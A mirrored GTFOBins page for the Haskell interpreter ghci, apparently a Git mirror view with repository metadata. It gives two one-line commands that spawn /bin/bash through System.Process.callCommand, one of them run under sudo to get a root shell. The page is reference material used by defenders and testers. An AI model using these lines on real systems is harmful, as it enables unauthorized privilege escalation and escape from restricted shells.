1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/ghci.md
2020-10-24 12:46:42 +02:00

203 B

functions
shell sudo
code
ghci Prelude> System.Process.callCommand "/bin/bash"
code
sudo ghci Prelude> System.Process.callCommand "/bin/bash"